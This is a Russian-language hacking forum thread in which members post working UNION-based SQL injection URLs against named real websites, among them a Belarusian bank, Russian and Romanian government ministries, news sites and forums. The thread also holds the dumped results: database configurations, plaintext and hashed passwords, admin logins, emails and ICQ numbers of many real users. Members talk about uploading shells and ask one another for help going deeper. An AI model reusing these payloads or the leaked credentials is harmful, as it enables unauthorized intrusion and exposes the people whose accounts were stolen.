SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. TheSoul

    TheSoul Elder - Старейшина

    Joined:
    12 Nov 2007
    Messages:
    83
    Likes Received:
    35
    Reputations:
    0
    http://newkurkino.ru

    http://newkurkino.ru/modules.php?op=modload&name=News&file=article&sid=-1+union+select+1,concat_ws(0x2F,version(),database%20(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*

    4.0.26-log/udb223/Uwww223S@localhost
     
  2. fntms

    fntms Member

    Joined:
    21 Nov 2007
    Messages:
    0
    Likes Received:
    11
    Reputations:
    0
    пиво..течет рекой..

    вот сайтец..нормально его тоже можно ковырнуть.. вообще есть контора одна на украине..издательство..так у них там много подвязано сайтов в сети.. журнал какой-то выпускают..домашникй кампутер..если кому интересно, стучите в асю..там есть лазейка..и шел залить можна...
    http://www.hotline.ua/pr/193-11-248/?v=438%20AND%201=3%20union%20select%201,2,3,host,5,6,7,8,9,10,11,12,13,12,15,16,17,LOAD_FILE('/server/htdocs/'),19,20,21,22,23,24,25,26,27,28,29,30,31%20from%20mysql.user/*&t=0&o=0&d=0&p=0

    Снова UA
    Сайт какой-то турфирмы..НО! хостится он на серваке каким-то образом связанным с правительством.. (по словам одного из админов одного сайта, точно также хостящегося на етом серваке..может и песдит..мне пох)
    http://turi100.net/reviews/?review_id=225%20and%201=3)%20union%20select%201,2,3,version(),5,6/*версия мускула позволяет мне опустить рассказы о существующих таблицах..читаем отзывы туристов..в каментах..

    Вот это сайт..у меня вообще слабость к базам данных..особенно телефонным..но тут, к сожелению, ничего не срослось, народ, прошу помощи у тебя, будет доступ к базе - отпишитесь
    http://www.btk-online.ru/rest/?&r=2749%20union%20select%20concat(user,char(124),password,char(124),host)%20from%20mysql.user%20/*

    Ждите продолжения :p
     
    1 person likes this.
  3. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    Белвнешэкономбанк
    Code:
    http://bveb.by/currency/pmetals.php?Metal=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4,5,6/*&DateStamp=2007-11-20%2000:00:00
    А вот для входа юзеров там савсем другой сайтик.... интересно и там порыться но это уже другая история :)
     
  4. EST a1ien

    EST a1ien Elder - Старейшина

    Joined:
    2 Apr 2006
    Messages:
    249
    Likes Received:
    48
    Reputations:
    16
    Сайт сервера la2 - стоит java эмуль

    список табличек
    Code:
    http://www.l2planet.ru/?go=files&type=3%20union%20select%201,2,table_name,4,5,6,7%20from%20information_schema.tables/*
    список пользователей + пасы
    Code:
    http://www.l2planet.ru/?go=files&type=3%20union%20select%201,2,account,newpass,oldpass,6,7%20from%20pass_ls_l2pl/*
    пасы зашифрованы таким образом
    PHP:
    base64_encode(pack("H*",sha1(utf8_encode($password))));
    такчто расшифровывать можно долго(или я неправ)

    LOAD_FILE - запрещен
    кавычки запрещены - меджик квотес (приходится юзать char())
    Вобщем нечего более интересного добыть не удалось.
     
    #3784 EST a1ien, 22 Nov 2007
    Last edited: 22 Nov 2007
    1 person likes this.
  5. Dark[<X>]D1ablo

    Dark[<X>]D1ablo New Member

    Joined:
    21 Oct 2007
    Messages:
    5
    Likes Received:
    3
    Reputations:
    0
    Code:
    http://www.hpol.org/transcript.php?id=-92+union+select+1,table_name,version(),4,database()+from+iNFORMATION_SCHEMA.TABLES+limit+0,2/*
    version=mysql 5.0.27
    user=ro@localhost
    database= listen


    Code:
    http://www.tat.pl/sztuka_ld.php?id=-776+union+select+1,table_name+from+INFORMATION_SCHEma.tables/*
    version= 5.0.33
     
    #3785 Dark[<X>]D1ablo, 23 Nov 2007
    Last edited: 23 Nov 2007
  6. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    2 Dark[<X>]D1ablo
    Code:
    http://www.hpol.org/transcript.php?id=-92+union+select+1,concat(table_schema,0x3a,table_name),3,4,5+from+INFORMATION_SCHEMA.columns+where+column_name=0x70617373776F7264+limit+0,1/*
    hpol:administrator

    Code:
    http://www.hpol.org/transcript.php?id=-92+union+select+1,concat_ws(0x3a,name,password),3,4,5+from+hpol.administrator+limit+0,1/*
    Tao Huang:test
    Admin:hpol
    Jerry Goldman:jumber
    stubaker:admin
    Tony Becker:shooter

    Такой вид скули более интересен =)
     
    1 person likes this.
  7. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://www.correl.ru/intresting.php?id=-557+union+select+1,2,3,table_name,5,6+from+information_schema.columns+where+column_name=0x70617373776f7264/*
    Code:
    8 баз
    administrators.
    cinema_accounts.
    flashchat_rooms.
    flashchat_users.
    forum_users.
    ibf_forums.
    ibf_members.
    user.
    1 база [administrators.]
    login: password:

    andy pereslavl
    mishasun 2038134

    2 База [forum_users]

    Nick: password: mail:

    Code:
    Самозванец/4321/[email protected].
      Asa/231274/[email protected].
      Киса/2005/123.
      Ёлка/4321/[email protected].
      Alpik/0221/[email protected].
      Geniy/123789/werty.
      Taret/987321/asdf.
      Neon/456321/lkjh.
      КОНТРА/7777/[email protected].
      Рамиль/bubas/[email protected].
      niagara/1234/zxc.
      Ирина/13579/[email protected].
      дима/killer/[email protected].
       Киса/2005/123.
       Ёлка/4321/[email protected].
    3 база [ibf_members]

    Name: Password: email: icq:
    Code:
      Guest//[email protected].
            asa/d744696db9cf57a74b7cba61daa3899c/[email protected]/257957338.
            clon/c5b2cebf15b205503560c4e8e6d1ea78/[email protected].
            deva/c5b2cebf15b205503560c4e8e6d1ea78/[email protected].
            Jene4ka/633909fd73441abd86c2e934fe82b3aa/[email protected]/110310110.
            nata1/827ccb0eea8a706c4c34a16891f84e7b/[email protected]/.
            Lena/04f8c854cb60b1b9f23cafe7501ccf79/[email protected].
            Lidia/71b3b26aaa319e0cdf6fdb8429c112b0/[email protected].
            ninok/c5b2cebf15b205503560c4e8e6d1ea78/[email protected].
            Вера/c5b2cebf15b205503560c4e8e6d1ea78/[email protected].
            repic/c5b2cebf15b205503560c4e8e6d1ea78/[email protected].
            Аяна/60d75b56ccd0786104966d0923c7e2f1/[email protected].
            isa/a8698009bce6d1b8c2128eddefc25aad/[email protected].
            Iricka/1c8d2ab0dceeab4ee9df6b408662dfc3/[email protected].
            алена/d70ebd4b4a1e63cbe210c5deb84866a0/[email protected].
            Tanya/040b7cf4a55014e185813e0644502ea9/[email protected]/312780559.
            E-dgin/a8e8a72b3a601405353123027f0aaf8a/[email protected]/.
            КОНТРА/900293ddcbf0e10d40732e5f2d41cdb5/[email protected].
            КОНТРОЛЕР/cc57497c5e0d93bab6b3ca140b33428a/[email protected]/.
            Синяя роза/3f366c879a71e9ba217568f1d2a0a8c5/[email protected]/.
            Collins/a822c1b51da67e079bf1c461f85cb1cb/[email protected]/329017195.
            дедушкин   ТАБАК!!!!!!/4297f44b13955235245b2497399d7a93/[email protected]/111603986.
            dolla®/4bc74efcbe25b1e867ef19a1f56872ca/[email protected].
            Dulcineya/4ed88732144d08f24d136825383759a0/[email protected].
            pilligrim/baf4d8a3668a117e64bb4881639826a7/[email protected].
            Konstantin/14dc0375ed631ce6f134abbf042fd845/[email protected].
            Тайский/e10adc3949ba59abbe56e057f20f883e/[email protected]/.
            АНИКЕН/007769e839806c0a6376c5a18e4bd7a5/[email protected].
            ЭНИКЕН/cc57497c5e0d93bab6b3ca140b33428a/[email protected].
            БИ О/cc57497c5e0d93bab6b3ca140b33428a/[email protected].
            ЛО!/cc57497c5e0d93bab6b3ca140b33428a/[email protected].
            viola/e10adc3949ba59abbe56e057f20f883e/[email protected].
            Ш УРА/007769e839806c0a6376c5a18e4bd7a5/[email protected].
            SHУРА/cc57497c5e0d93bab6b3ca140b33428a/[email protected].
            ДИМОН 25/cc57497c5e0d93bab6b3ca140b33428a/[email protected].
            МАКСВЕЛЛ/f343bfc68486ab3c37e9c3e4e151b277/[email protected]/202414832.
            Miledy/633909fd73441abd86c2e934fe82b3aa/[email protected].
            Black_Rose/a19e98b06127b9f0cce5e0d7a1851438/[email protected]/169378935.
            ЖЕЛАННАЯ/a7d6985a6157a276a7d2d7e75e9aadec/[email protected].
            ЖЕЛАННАЯ/cc57497c5e0d93bab6b3ca140b33428a/[email protected].
            Nata/c68f1a64b81f32be5fd83587de848e89/[email protected].
            sexygerl/827ccb0eea8a706c4c34a16891f84e7b/[email protected].
            Yulja/a4e28cb962c7595d2a06563521dce4d6/[email protected].
            ГЕСС/cc57497c5e0d93bab6b3ca140b33428a/[email protected].
            Алексей Сергеев/f497b7c74a361d9212acec1808a85918/[email protected].
            зайка/cc57497c5e0d93bab6b3ca140b33428a/[email protected].
            МАЛЬВИНА/e6c7c37b7b3982be6ec9328480f7130b/[email protected].
            ana/827ccb0eea8a706c4c34a16891f84e7b/[email protected]/.
            Stasya/389861652a2f1a07a1074bd0727efe81/[email protected]/53407902.
            Pesi/599481398359afbd99278929eb02f420/[email protected]/.
            LonelySoul/c39c35b146e4f2b8bd051f87ed702143/[email protected]/192811435.
            helen/89e064f5b7ed7f3ad2def76de9375b69/[email protected].
            saz5x/e10adc3949ba59abbe56e057f20f883e/[email protected].
            гадя петрович хренова/cc57497c5e0d93bab6b3ca140b33428a/[email protected].
            Убитый/e9fb2eda3d9c55a0d89c98d6c54b5b3e/[email protected].
            nawiht/ee3c517129c3af53d31ec4465dc3ebd0/[email protected]/336587053.
            Nik/baf22ddb7b1a317d860f48638254e2e9/[email protected].
            voron/bb9fbb5184689258492a7b9e308462c2/[email protected].
            OttO/81dc9bdb52d04dc20036dbd8313ed055/[email protected].
            ангело4ек/23804091115791b3b331fd1e1fa7355d/[email protected]/268806236.
            Alexander1/449a8249933eeeff8d5e192a10bba221/[email protected].
            kostyan/f7c637636b330a0a350140173e0ee9e1/[email protected].
            ИРБИС/65609ad84147ff8dea5ad068c66a1447/[email protected].
            *turklin*/a598fb9489bb74c48129214fc3f95c52/[email protected].
            Правовая защита и консалтинг/827ccb0eea8a706c4c34a16891f84e7b/[email protected]/.
            Елена/555f2b90974eb8d447626037de2d4c18/[email protected].
            Екатерина/d93591bdf7860e1e4ee2fca799911215/[email protected].
            1megastar/f3f2dbe8093c29b9adda8b13ed45a06a/[email protected].
            -kisa-/3bdf27c799f2a88ef2acd8148b0a6730/[email protected].
            Darlinga/e10adc3949ba59abbe56e057f20f883e/[email protected].
            webmoneyjob/343b1c4a3ea721b2d640fc8700db0f36/[email protected].
            *yan*/7219b9b60d9d70a9a7014369d88ebefe/[email protected].
            Ada/a152e841783914146e4bcd4f39100686/[email protected].
            Девственница/cc57497c5e0d93bab6b3ca140b33428a/[email protected]/.
            ogqxeefb/700a9c6f1350c602633df5f8d682ca77/[email protected].
            tvjaznx/8aa150a326ea92cdc8c427ddce5f7e8c/[email protected].
            zlswpu/eddd10c5af29183c2f33b484f7fdeee7/[email protected].
            lqtmzopbtu/23e7640c6fc4a8864725d2591c7168df/[email protected].
            ocxlc/02812bd32dbf58e31b6d8bb328077be0/[email protected].
            tjflkycln/05fa3e07e8f3e69cf1fce3d0820e01cd/[email protected].
            ibiccju/e0e6795666966ddad025fa651d17c284/[email protected].
            NUR/827ccb0eea8a706c4c34a16891f84e7b/[email protected].
            wbmco/3a9cd4fb04b65e7611a941c81d468898/[email protected].
            mnpfnyddlw/4e7c8fb0c2fbe4e5b08e612fcb5386a4/[email protected].
            ocrzecf/9f629790a33a632b73e073ea6760d4af/[email protected].
            ndgnswryz/4dc2ca96bafc5e88169004dd1ebdc1bb/[email protected].
            skjbfcgwqc/ffcba34286b1b73e37c7b4a85793e4c1/[email protected].
            tehnyk3/e10adc3949ba59abbe56e057f20f883e/[email protected].
            jyvdyly/9c6d6f61bfa71179977706739046bafc/[email protected].
            bkhhus/30517df6d4910b09f49d86e82323ac45/[email protected].
            myfduygp/62715d5a8e44894cd6486c9fe44a041a/[email protected].
            hewduiipd/f30c512e247edca62f39f84e6289d4ea/[email protected].
            xgatmbll/c2ae1896b1682440c04725cecada70a4/[email protected].
            mssoft/e10adc3949ba59abbe56e057f20f883e/[email protected].
            mdbgfqcb/240a2cc4464bc9038e9017a8a6722e82/[email protected].
    4 база [cinema_accounts]
    Name: Login: Password:
    Code:
     Артем Первин/versus/08616ab08c5f7c9bc9b08ff2e827c20b.
    Дмитрий/Felix/81dc9bdb52d04dc20036dbd8313ed055.
    Оксана/Oksana/d0dbe915091d400bd8ee7f27f0791303.
    Сергей Алпаткин/asa/6885e793942458d3ba11f083f35d8178.
     
    3 people like this.
  8. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    Румыния

    mednews.ro - медицина
    Code:
    http://www.mednews.ro/arh.php?searchtype=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11/*&searchterm=a
    4.1.22-standard:mednews_mednews:mednews_mamb1@localhost (нижняя строка таблицы)
    ФТП: ftp.mednews.ro

    esp2000.ro - Electronica Azi
    Code:
    http://www.esp2000.ro/articol.php?id_ar=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18/*
    4.0.27-log:electronicaazi:electronicaazi@localhost

    interactiunietnice.ro
    Code:
    http://www.interactiunietnice.ro/articol.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/*
    5.0.27-standard-log:interact_main:interact_root@localhost

    51 таблица:
    Code:
    http://www.interactiunietnice.ro/articol.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(table_name,0x71),0x71),4,5,6,7+from+information_schema.tables+limit+50,1/*
    Наша таба - phpbb_users - интересные поля:
    Code:
    username,user_password,user_level,user_email,user_icq,user_website,user_aim,user_yim,user_msnm,user_occ
    Словарики хилые, поэтому данные на админа только так [login:MD5(pass):email]:
    Code:
    redactor:92a7593c6875ef1bdf0b4c779dd3efd6:[email protected]
     
    2 people like this.
  9. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    Румыния ... как ни странно!

    ms.ro - какое-то медицинское Министерство Румынии
    Code:
    http://www.ms.ro/afis/pag.asp?idd=94&doi=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10/*
    5.0.27-community-max-nt:a_ms:ODBC@localhost

    59 таблиц:
    Code:
    decl_av
    lst
    lst_sc
    men
    men_bk
    pghtml
    viz2
    viz2_old
    vizms
    bm
    cat_caz
    cat_indicator
    cat_jud
    cat_sectiune
    date_jud
    ape
    ape_av
    ape_comp
    ape_comp_not
    aviz
    chimice
    cosme
    judete
    nc_aprob
    nc_aprob1
    nc_aprob_r
    not_cosm
    not_cosm1
    not_cosm_dbl
    not_cosm_r
    not_lab
    not_lab_notif
    not_lab_prod
    notif
    produs
    scheme
    sup_al
    tari
    discut
    pro_disc
    abilitari_notificari
    abilitari_notificari_upload
    activ_demnitari
    По названиям таблиц - мало что понятно,
    по названию полей в таблицах - ещё меньше... Вобщем заипался юзеров искать!
    Кое-какие сведения юзеров встретил в табе notif

    acta-cytol.com - журнал клинической цитологии и цитопатологии Румынии
    Code:
    http://www.acta-cytol.com/toc/auto_abstract.php?id=-1+-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
    4.0.13-nt:acta:acta_db@localhost
     
  10. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    нашел в кладовке sql-inj на 604poker.com =)
    Code:
    http://[COLOR=Gray]www.604poker.com[/COLOR]/display.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,version(),0x3a,database()),12,13,14,15/*
    604poker@localhost:5.0.24:604poker_com
    Code:
    http://[COLOR=Gray]www.604poker.com[/COLOR]/display.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(Host,0x3a,User,0x3a,Password),12,13,14,15+from+mysql.user+limit+0,1/*
    localhost:root:392d71987544b253
    mikethicke.com:root:392d71987544b253
    66.84.13.133:root:392d71987544b253
    %:root:392d71987544b253
    localhost.localdomain:root:392d71987544b253
    %:wikiuser:6509500e0c6c52c4 //пароль:d65k321
    localhost.localdomain:wikiuser:6509500e0c6c52c4
    %:604poker:392d71987544b253
    localhost:604poker:392d71987544b253
    :mike:5206044616733ec8
    localhost:mike:5206044616733ec8
    sga:5b24704e417d3f71 //пароль:terra2
    localhost:sga:5b24704e417d3f71
    localhost:h4w55262:392d71987544b253 //это впоследствии окажется логин к фтп =))
    Code:
    http://[COLOR=Gray]www.604poker.com[/COLOR]/display.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(name,0x3a,pass),12,13,14,15+from+604poker_com.dbusers+limit+0,1/*
    admin:$1$Tmj.kF27$yqyJjREgZQ6/pydTRwET00
    Code:
    http:// [COLOR=Gray]www.604poker.com[/COLOR]/ admin
    admin:76trew21
    Code:
    http://[COLOR=Gray]www.604poker.com[/COLOR]/display.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,user_password,0x3a,user_email,0x3a,user_icq),12,13,14,15+from+phpbb2_users+limit+1,1/*
    admin:36194e87e76797813435263e4cb2666e:linden16
     
    2 people like this.
  11. fntms

    fntms Member

    Joined:
    21 Nov 2007
    Messages:
    0
    Likes Received:
    11
    Reputations:
    0

    http://bveb.by/currency/pmetals.php?Metal=-2+union+select+1,LOAD_FILE(char(47)),3,4,5,6%20from%20mysql.user/*&DateStamp=2007-11-20%2000:00:00

    $DBhost="localhost";
    $DBuser="vbank";
    $DBpassword="Dilnak41";
    $DBdatabase="bvebank";
    $CommonResurseLocation = "http://217.23.115.9/";

    коннект к мускулу возможен с любого хоста

    user: vbank
    host: %

    таблицы.
    bvebank (48)

    balanc1
    balance
    balanceitem
    bankfinnews
    bankomat
    bankomat_city
    bankomat_users
    banktitles
    br1
    br2
    bv
    cp
    d_currency
    d_filials
    d_name
    d_percent
    d_stavki
    d_users
    filials_time_work
    mainfinacts
    mainfinactsarch
    metalr1
    metalr3
    metalr4
    metalr5
    metalr6
    metalr7
    metalt1
    metalt3
    metalt4
    metalt5
    metalt6
    metalt7
    mt1
    mt2
    opros
    opros1
    opros2
    partner
    pmetals
    property
    propertyitem
    revenue
    revenueitem
    sadmusers
    subscribertasks
    subscribeusers
    users
     
    2 people like this.
  12. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Ахалай махалай рахат лукум sql-inj на vfs.com =)
    собсно найдена она была давно... и на ней уже успел "поработать" какой-то сеошник =(
    красивый вывод всех таблиц...
    Code:
    http://[COLOR=DarkOrange]www.vfs.com[/COLOR]/faculty.php?id=-1+union+select+1,concat(table_name),3+from+information_schema.tables/*
    Code:
    http://[COLOR=DarkOrange]www.vfs.com[/COLOR]/faculty.php?id=-1+union+select+1,concat(auth_username,0x3a,auth_password),3+from+vfscom_db.auth_tbl/*
    stephen:261972f4500fa75a //пароль:eezy4u:
    ccalnan:28f639a5162ecbb9
    jderry:17fc2e8f0148bb35 //пароль:beb78e:
    beata:0b097aa7659f8502
    bbains:261972f4500fa75a //пароль:eezy4u:
    studentservices:41acaf8f60411fc0
    jennica:314f01b446e888ba
    olambert:5a4e3a8648b173d6
    mediateam:261972f4500fa75a //пароль:eezy4u:
    lhenderson:261972f4500fa75a //пароль:eezy4u:
    jbringsli:264f74d364088dd0
    jmorris:61f5620c5a2c7c05
    wtsang:659bab5b180b310c
    Code:
    http://[COLOR=DarkOrange]www.vfs.com[/COLOR]/robots.txt
    User-agent: *
    Disallow: /webtv/
    Disallow: /webtv.php
    Disallow: /index_down.html
    Disallow: /htmlemail/
    Disallow: /webs/
    Disallow: /backend/ //админка

    также там есть вордресс...
     
  13. Mike 007

    Mike 007 Elder - Старейшина

    Joined:
    4 Apr 2007
    Messages:
    58
    Likes Received:
    47
    Reputations:
    -4
    http://www.dropball.ru/casino-bet.php?t=e07&userid=-1+union+select+1,2,3,4,5,6,7,8/*
    Что делать дальше? Отпишитесь пожалуйста.
    dropball@localhost
     
    #3793 Mike 007, 23 Nov 2007
    Last edited: 23 Nov 2007
  14. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    БД версия 4
    Нашёл только w3t_Boards w3t_Posts
    Хотя вру там учитывай регистр тебе не покажет w3t_user а w3t_User будет верно
    т.е.
    HTML:
    http://www.dropball.ru/casino-bet.php?t=e07&userid=-1+UNION+SELECT+1,2,3,4,5,6,7,8+FROM+w3t_Users/*
    Полей пока не нашёл
     
  15. Mike 007

    Mike 007 Elder - Старейшина

    Joined:
    4 Apr 2007
    Messages:
    58
    Likes Received:
    47
    Reputations:
    -4
    https://www.cbil.upenn.edu/svn/gus/GusAppFramework/tags/DistribJob_release_1-0/Model/schema/oracle/users.sql
    а тут что можно сделать?
     
  16. fntms

    fntms Member

    Joined:
    21 Nov 2007
    Messages:
    0
    Likes Received:
    11
    Reputations:
    0
    есть немного

    Газетки почитать ..
    http://www.trud.ru/issue/article.php?id=-200711212130102%20union%20select%201,2,3,name,5,password,7,8,9,10,11,12,13,14%20from%20forum.ibf_members%20where%20id=1/*
    в админке был..залить шел не удалось..чет там намудрил админ..

    Тут погода ..типа ;)
    http://news.gismeteo.ru/?newsitem=63331505902%20UNION%20select%201,2,3,4,5,6%20from%20news
    ..ничего не понял..т.е. че делать дальше не придумал

    Банкир.ру ..
    http://kurs.bankir.ru/index.php/abs/1/?v2=0&v1=170&fromd=23&fromm=10&fromy=2007&tod=-23'%20union%20select%201,2,3,version()/*&tom=11&toy=2007
    Пятый мускул.. есть там чет типа админки, но только курсы валют подходят, до админки самого банкира (админ.банкир.ру) так и не добрался.. если есть в зале жуки майские, поднимите руку.

    http://maryjane.ru - магазин футболок..
    http://maryjane.ru/?action=reprintrequest&goodId=-16422'%20union%20select%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*
    таблица юзерс..поле пассворд..да сами все пймете..
    5.0.27
     
    1 person likes this.
  17. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    Министерство природных ресурсов российской федерации
    HTML:
    http://www.mnr.gov.ru/part/?act=more&id=4409&pid=11+UNION+SELECT+concat(login,0x3a,password),2+From+users+limit+1,1/*
    БД версии 4
    SANTIAGO:GAHAN200
    ADMIN_CONT:WAS4CRF
    ADMIN_NEWS:ADMKOMP
    ADMIN_VODA:HGC3MK9S
     
  18. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    ЕЕстония

    www.kert.diip.ee

    Code:
    http://kert.diip.ee/index.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5+--+
    4.1.22-standard-log:diip_kert@localhost:diip_kert

    Code:
    http://kert.diip.ee/index.php?id=-1+union+select+1,2,concat_ws(0x3a,user_name,password),4,5+from+user+limit+0,1+--+
    past:f16b82ee4c79ac26a8c8882cb2e7c525
    niko:f42a0453acb448913db7ac8340b5b4f7
    anc:e8a28a7ba22e61ddd16612b6d0d6947f
    joe:539e53ab51366fccd762c14cfb4a4665
    ------------------------------------
    86 пользователей
     
    2 people like this.
  19. min7

    min7 Elder - Старейшина

    Joined:
    3 Sep 2005
    Messages:
    117
    Likes Received:
    85
    Reputations:
    11
    Code:
    http://www.[COLOR=DarkOrange]adapt.org[/COLOR]/adaptpr/index.php?mode=P&id=-253+union+select+1,concat_ws(char(58,58),user(),database(),version()),3,4,5,6,7/*  
    www@localhost::archives::4.0.12-max
    Code:
    http://www.[COLOR=DarkOrange]troc-velo.com[/COLOR]/index.php?mode=1&annonce=-46890+union+select+concat_ws(char(58,58),user(),database(),version()),2,3,4/*  
    [email protected]::webmaster::5.0.32-Debian_7etch1-l
    89 таблиц
     
    1 person likes this.
  20. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    www.kromestudios.com

    4.1.11-Debian_4sarge5-log

    Code:
    http://www.kromestudios.com/games/overview.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,AES_DECRYPT(AES_ENCRYPT(user,0x71),0x71),AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71)),9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mysql.user+--+
    root:3da66bb67d498077
    root:*33674D9ADE349AFD9256D9D109447C6F0540E387
    :*33674D9ADE349AF
    webmaster:0e1c10731366477a
    web_bushrescue:76b68e694c41cbd4
    sdb:273ff1036ed30d3f
    kromeweb:772deb3439d64f29
    web_bushrescue:
    NOTQ:772deb3439d64f29
    andygreen:7ca4c29d7375760c
    kromeweb:*C8B0D9F346E669563013B3830EDB947F940930D9
     
    1 person likes this.
Thread Status:
Not open for further replies.